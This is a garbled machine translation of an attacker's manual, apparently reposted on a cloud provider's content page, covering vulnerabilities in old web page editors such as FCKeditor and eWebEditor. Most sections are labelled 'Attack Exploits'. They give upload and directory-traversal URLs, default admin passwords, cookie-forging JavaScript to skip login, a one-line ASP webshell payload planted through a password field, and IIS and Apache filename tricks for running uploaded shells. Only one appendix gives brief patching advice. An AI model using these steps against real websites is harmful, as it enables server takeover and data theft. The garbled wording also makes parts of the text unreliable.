Common Web page Editor Vulnerability Manual (full version) FCKEDITOR,EWEBEDITOR_ Web page Editor

Source: Internet
Author: User
Tags compact file upload php and rar microsoft iis
FCKeditor

FCKeditor Editor page/view Editor Version/view File upload path

FCKeditor Editor Page

Fckeditor/_samples/default.html

View Editor Version

Fckeditor/_whatsnew.html

View File Upload Path

Fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp? command=getfoldersandfiles&type=image&currentfolder=/

Part of the second line of "Url=/xxx" in an XML page is the default datum upload path

NOTE:[HELL1] The latest version as at February 15, 2010 is FCKeditor v2.6.6

[Hell2] Remember to modify two of the scripting languages that ASP is actually using for FCKeditor

FCKeditor of filtering problem caused by passive restriction strategy

Impact version: FCKeditor x.x <= FCKeditor v2.4.3

Vulnerability Description:

FCKeditor v2.4.3 file category default reject upload type: html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|

Pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

Fckeditor 2.0 <= 2.2 allows files to be uploaded ASA, CER, PHP2, PhP4, Inc, PWML, PHT suffix

After uploading, it saves the file directly using the $sfilepath = $sServerDir. $sFileName, instead of using $sextension as a suffix

Directly resulting in win under the upload file after the add a. To break through [not tested]

In Apache, because the "Apache file name resolution flaw vulnerability" can also be used, see "Appendix A"

It is also recommended that you use the file class to upload files when defining type variables in other upload vulnerabilities, which are limited in their limitations according to FCKeditor code.

Attack Exploits:

Allow any other suffix to upload

Using 2003 path parsing vulnerability to upload a web horse

Impact Version: Appendix B

Vulnerability Description:

Using the 2003 System Path Parsing vulnerability principle, create a directory such as "Bin.asp", and then upload files in this directory can be executed by the script interpreter with the appropriate script permissions.

Attack Exploits:

Fckeditor/editor/filemanager/browser/default/browser.html? Type=image&connector=connectors/asp/connector.asp

FCKeditor php Upload Any file vulnerability

Impact Version: FCKeditor 2.2 <= FCKeditor 2.4.2

Vulnerability Description:

FCKeditor there is an input validation error while processing a file upload, a remote attack can use this vulnerability to upload arbitrary files.

When uploading files through editor/filemanager/upload/php/upload.php, an attacker can cause an arbitrary script to be uploaded by defining an invalid value for the type parameter.

A successful attack requires file uploads to be enabled in the config.php configuration file, which is disabled by default. Exploit: (Please modify the action field for the specified URL):

FCKeditor "=2.4.2 for php.html

Note: If you want to try the v2.2 version of the vulnerability, you can modify the Type= any value, but notice that if you change the media must be capitalized first letter m, otherwise, Linux, FCKeditor will file directory for the famous school inspection, will not upload success.

type Custom variables arbitrary upload file Vulnerability

Impact Version: Earlier version

Vulnerability Description:

By customizing the parameters of a type variable, you can create or upload files to the specified directory, and there are no restrictions on uploading file formats.

Attack exploits:/fckeditor/editor/filemanager/browser/default/browser.html? Type=all&connector=connectors/asp/connector.asp

Open this address can upload any type of file, Shell upload to the default location is:

Http://www.heimian.com/UserFiles/all/1.asp

"Type=all" is a custom variable, where all is created, and the new directory has no restrictions on uploading file formats.

Like input:

/fckeditor/editor/filemanager/browser/default/browser.html? Type=.. /&connector=connectors/asp/connector.asp

The net horse can be uploaded to the root directory of the website.

Note: If you cannot find the default Upload folder to check this file: Fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp? command=getfoldersandfiles&type=image&currentfolder=/

FCKeditor News Component Traversal Directory vulnerability

Impact version: ASPX version fckeditor, remaining version not tested

Vulnerability Description: How to get Webshell please refer to "type custom variable upload file vulnerability" above

Attack Exploits:

Modify CurrentFolder parameter use ... /.. /To enter a different directory

/browser/default/connectors/aspx/connector.aspx? Command=createfolder&type=image&currentfolder=.. /.. /.. %2f&newfoldername=aspx.asp

Depending on the XML information returned, you can view all the directories in the Web site.

/browser/default/connectors/aspx/connector.aspx? command=getfoldersandfiles&type=image&currentfolder=%2f

Other ways of uploading Webshell in FCKeditor

Impact version: Non-optimized/compact version of FCKeditor

Vulnerability Description:

If the following files are present, you can upload the files when you open them.

Attack Exploits:

Fckeditor/editor/filemanager/upload/test.html

Fckeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor file Upload "." Bypass method to change "_" Underline

Impact version: FCKeditor => 2.4.x

Vulnerability Description:

We uploaded the file for example: Shell.php.rar or shell.php;. JPG will become shell_php; JPG This is the change of the new FCK.

Attack Exploits:

Submitting 1.php+ spaces can bypass all,

※ However, the space only supports win system *nix is not supported [1.php and 1.php+ spaces are 2 different files]

Note:upload/2010/3/201003102334372778.jpg is filtered in such a format. That is, the IIS6 parsing vulnerability.

Uploaded for the first time. is filtered to 123_asp;123.jpg and cannot be run.

But the 2nd time after uploading the same file 123.asp;123.jpg. Because "123_asp;123.jpg" already exists.

The filename is named 123.asp;123 (1). jpg ... 123.asp;123 (2). jpg the numbering method.

So. The IIS6 vulnerability continues to execute.

If you have not succeeded in testing through the steps above, there are several possible reasons for this:

1.FCKeditor does not have file upload enabled, this feature is turned off by default when installing FCKeditor. If you want to upload a file, FCKeditor will give you the wrong hint.

2. The Web site uses a compact version of the FCKeditor, a thin version of the FCKeditor many features lost, including file upload function.

This flaw in 3.FCKeditor has been fixed.

--------------------------------------------------------------------------------

Ewebeditor

Ewebeditor use of basic knowledge

Default Background address:/ewebeditor/admin_login.asp

It is advisable to detect whether the admin_style.asp file can be accessed directly

Default database path: [Path]/db/ewebeditor.mdb

[Path]/db/db.mdb--This database is in some CMS

You can also try [path]/db/%23ewebeditor.mdb--some admin-smart little trick

Use default password: admin/admin888 or admin/admin into the background, you can also try admin/123456 (some administrators and some CMS, this is the set)

Click "Style Management"--you can select new styles, or modify a |asp style, add the type of upload that is allowed by the picture control, plus the following types, |asa, |AASPSP, or |cer, as long as the type of script that the server allows to execute, click "Submit" and set the toolbar--" Insert Picture control on the Add. Then--Preview this style, click Insert Picture, upload Webshell, and view the path of the uploaded file in "code" mode.

2, when the database is modified by the Administrator for ASP, ASA suffix, you can plug in a word trojan server into the database, and then a word Trojan Client connection down Webshell

3. Unable to execute after uploading? Hot pot You go back style management look at the style you edited, you can customize the upload path!!!

4, set the upload type, still upload not? It is estimated that the file code has been changed, you can try to set the "remote type" in accordance with the 6.0 version of the Shell method to do (see below ↓), can set the type of automatic save remote files.

5, can not add toolbars, but set a style of the file type, how to do? ↓ do it!

(Please modify the Action field)

Action.html

Ewebeditor the footprints of the invasion

Vulnerability Description:

When we download the database and query the plaintext of the password MD5, we can go to see Webeditor_style (14) This style sheet, to see if the previous intrusion may have given the ability to upload a script control, the construction of the address to upload our own webshell.

Attack Exploits:

Like id=46 s-name =standard1.

Construction Code: Ewebeditor.asp?id=content&style=standard

ID and and style name changed after

Ewebeditor.asp?id=46&style=standard1

Ewebeditor Traversal Directory Vulnerability

Vulnerability Description:

Ewebeditor/admin_uploadfile.asp

Admin/upload.asp

LAX filtering, resulting in traversal directory vulnerabilities

Attack Exploits:

The first type: ewebeditor/admin_uploadfile.asp?id=14

Add &dir= after id=14 ...

and add &dir=. /..

&dir=http://www.heimian.com/../.. See the entire Web site file.

The second type: Ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./.

Ewebeditor 5.2-Column Directory vulnerability

Vulnerability Description:

Ewebeditor/asp/browse.asp

LAX filtering, resulting in traversal directory vulnerabilities

Attack Exploits:

http://www.jb51.net/ewebeditor/asp/browse.asp?style=standard650&dir=...././/..

Use the Webeditor session Spoofing vulnerability to enter the background

Vulnerability Description:

Vulnerability file: admin_private.asp

Only to judge the session, not to judge cookies and path validation problems.

Attack Exploits:

A new test.asp content is as follows:

  
Access test.asp, and then access any files in the background for example:Admin_Default.asp

Ewebeditor ASP version 2.1.6 Upload vulnerability

Exploit: (Please modify the action field for the specified URL)

Ewebeditor ASP version 2.1.6 upload exploit program. html

Ewebeditor 2.7.0 Injection Vulnerability

Attack Exploits:

http://www.jb51.net/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200

Default table name: Ewebeditor_system default column name: Sys_username, Sys_userpass, and then use NBSI to guess the solution.

eWebEditor2.8.0 final version Remove any file vulnerability

Vulnerability Description:

This vulnerability exists in the delete.asp file in the Example\newssystem directory, which is a Ewebeditor test page that can be entered directly without landing.

Exploit: (Please modify the action field for the specified URL)

Del files.html

Ewebeditor v6.0.0 Upload Vulnerability

Attack Exploits:

Click "Insert Picture" in the editor--Network--Enter the address of your Webshell in a space (note: file name must be: xxx.jpg.asp and so on, OK, click on the "Remote file automatic upload" control (the first upload will prompt you to install the control, just a moment), view " Code "mode to find the file upload path, Access can be, EWeb official demo can do so, but the upload directory to cancel the execution of permissions, so upload can not perform nets horse."

Ewebeditor php/asp ... Background pass kill loophole

Impact version: php≥3.0~3.8 and ASP version 2.8 is also common, perhaps a low edition can also be tested.

Attack Exploits:

Enter the background/ewebeditor/admin/login.php, random input a user and password, will prompt error.

This time you empty the URL of the browser and enter

Javascript:alert (document.cookie= "adminuser=" +escape ("admin"));

Javascript:alert (document.cookie= "adminpass=" +escape ("admin"));

Javascript:alert (document.cookie= "admindj=" +escape ("1"));

Then three times enter, empty the browser URL, now enter some ordinary access to files such as ... /ewebeditor/admin/default.php, you'll go straight in.

Ewebeditor for php arbitrary file Upload Vulnerability

Impact version: Ewebeditor PHP v3.8 or older version

Vulnerability Description:

This release saves all style configuration information as an array $astyle, and we can add our own favorite style and define the type of upload when php.ini configuration Register_global is on.

Attack Exploits:

Phpupload.html

Ewebeditor JSP Version Vulnerability

Much the same, I do not want to say more in this document, because there is no environmental testing, online dumps so big, not easy to troubleshoot. With the JSP editor I think EWeb will be much less than the FCKeditor share.

Ewebeditor 2.8 Business Edition of a word Trojan

Impact version: =>2.8 Commercial Edition

Attack Exploits:

Login background, click Modify Password---New password set to 1 ": Eval request (" H ") '

After the success of the set, access to the asp/config.asp file, a word Trojan is written to this file inside.

Ewebeditornet upload.aspx Upload Vulnerability (webeditornet)

Vulnerability Description:

Webeditornet is primarily a upload.aspx file that has an upload vulnerability.

Attack Exploits:

Default Upload address:/ewebeditornet/upload.aspx

A trojan that can upload a CER directly

If you cannot upload, enter Javascript:lbtnUpload.click () in the browser address bar.

After the success of the View source code found Uploadsave view upload save address, by default to uploadfile this folder.

Southidceditor (commonly used v2.8.0 version EWeb core)

Idceditor/datas/southidceditor.mdb ">http://www.heimian.com/admin/southidceditor/datas/southidceditor.mdb

Http://www.safe5com/admin/southidceditor/admin/admin_login.asp

Http://www.jb51.net/admin/southidceditor/popup.asp

Bigcneditor (EWeb 2.7.5 VIP core)

In fact, the so-called bigcneditor is the VIP user version of Ewebeditor 2.7.5. The reason why admin_login.asp is not accessible, suggesting "insufficient authority" 4 mantra, is estimated because of its authorized "licensed" problem, Perhaps only authorized machines are allowed to access the background.

Perhaps the following low-level gestures for ewebeditor v2.8 can be used on this. I don't seem to have much action.

--------------------------------------------------------------------------------

Cute Editor

Cute Editor Online editor contains vulnerabilities locally

Impact Version:

Cuteeditor for Net 6.4

Vulnerability Description:

Can view the content of the website file at will, the harm is bigger.

Attack Exploits:

Http://www.jb51.net/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=.. /.. /.. /web.config

--------------------------------------------------------------------------------

Webhtmleditor

Get Shell with Win 2003 IIS file name Resolution vulnerability

Impact version: <= webhtmleditor final version 1.7 (stopped updating)

Vulnerability Description/Attack utilization:

No renaming operation on uploaded pictures or other files, causing the malicious user to upload diy.asp;. JPG to circumvent the restrictions on the suffix name review, for this kind of editor because of the author's awareness of the mistakes, even if encountered thumbnails, file head detection, you can use the picture Trojan inserted a word to break through.

--------------------------------------------------------------------------------

Kindeditor

Get Shell with Win 2003 IIS file name Resolution vulnerability

Impact version: <= kindeditor 3.2.1 (latest edition released in August 09)

Vulnerability Description/Attack utilization:

Take the official to do a demo: Enter upload/2010/3/201003102334381513.jpg Everyone can go to onlookers.

Note: See Appendix C Principle Analysis.

--------------------------------------------------------------------------------

Freetextbox

Freetextbox Traversal Directory Vulnerability

Impact Version: Unknown

Vulnerability Description:

Because the ftb.imagegallery.aspx code only filters/But does not have the filter \ symbol, so there is a problem traversing the directory.

Attack Exploits:

In the editor page point the picture will pop up a box (grab the packet to get this address) constructed as follows, which can traverse the directory.

Http://www.jb51.net/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=.. &cif=\..

--------------------------------------------------------------------------------

Appendix A:

Apache filename resolution flaw vulnerability:

Test environment: Apache 2.0.53 winxp,apache 2.0.52 Redhat Linux

1. Foreign (SSR team) issued a number of advisory called Apache ' s MIME module (mod_mime) related vulnerabilities, is Attack.php.rar will be used as PHP file implementation of the vulnerability, including discuz! That P11.php.php.php.php.php.php.php.php.php.php.php.php.rar loophole.

2.S4T's Superhei posted this apache feature on the blog, which is that Apache checks the suffix from the back and executes it by the last legal suffix. In fact, just look at Apache's Htdocs those default installed index. XX documents will understand.

3.superhei has been said very clearly, can make full use of the upload vulnerability, I follow the general permission to upload the file format test, listed below (disorderly classification don't blame)

Typical type: rar

Backup type: Bak,lock

Streaming Media Type: WMA,WMV,ASX,AS,MP4,RMVB

Microsoft Type: sql,chm,hlp,shtml,asp

Any type: test,fake,ph4nt0m

Special type: Torrent

Program Type: jsp,c,cpp,pl,cgi

4. The key to the entire loophole is what Apache's "legal suffix" is, not the "legal suffix" that can be exploited.

5. Test environment

a.php

  
Then add any suffix test, a.php.aaa,a.php.aab ....

by Cloie, in Ph4nt0m.net (c).

Appendix B:

The IIS6 server (windows2003) is installed, and the affected file name suffix has. asp. Asa. CDX. cer. pl. php. CGI.

Windows 2003 Enterprise Edition is Microsoft's current mainstream server operating system. Windows 2003 IIS6 There is a vulnerability to file resolution paths, and when the folder name is similar to hack.asp (that is, the folder name looks like the file name of an ASP file), any type of file under this folder (such as. Gif,.jpg,.txt, etc.) Can be executed as an ASP program in IIS. So the hacker can upload the extension of jpg or GIF and so on looks like a picture file Trojan file, by accessing this file can run the Trojan horse. If any of these web sites have the name of a folder that ends with. asp. PHP, CER. asa. PL, and so on, any type of file placed under these folders may be considered a script file and executed by the script parser.

Appendix C:

Vulnerability Description:

When the file name is [yyy].asp; [Zzz].jpg, Microsoft IIS automatically resolves in ASP format.

And when the file name is [yyy].php; [Zzz].jpg, Microsoft IIS will automatically parse in PHP format.

where [YYY] and [ZZZ] are variable strings.

Impact Platform:

Windows Server 2000/2003/2003 R2 (IIS 5.x/6.0)

Patching method:

1, waiting for Microsoft-related patch Package

2, close the image directory of the script execution permissions (provided that some of your pictures are not mixed with the program storage)

3, verify the site program in all uploaded pictures of the code section, to form such as [yyy].asp; [Zzz].jpg's pictures do intercept

Note:

Not affected for Windows Server 2008 (IIS7) and Windows Server 2008 R2 (IIS7.5).

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.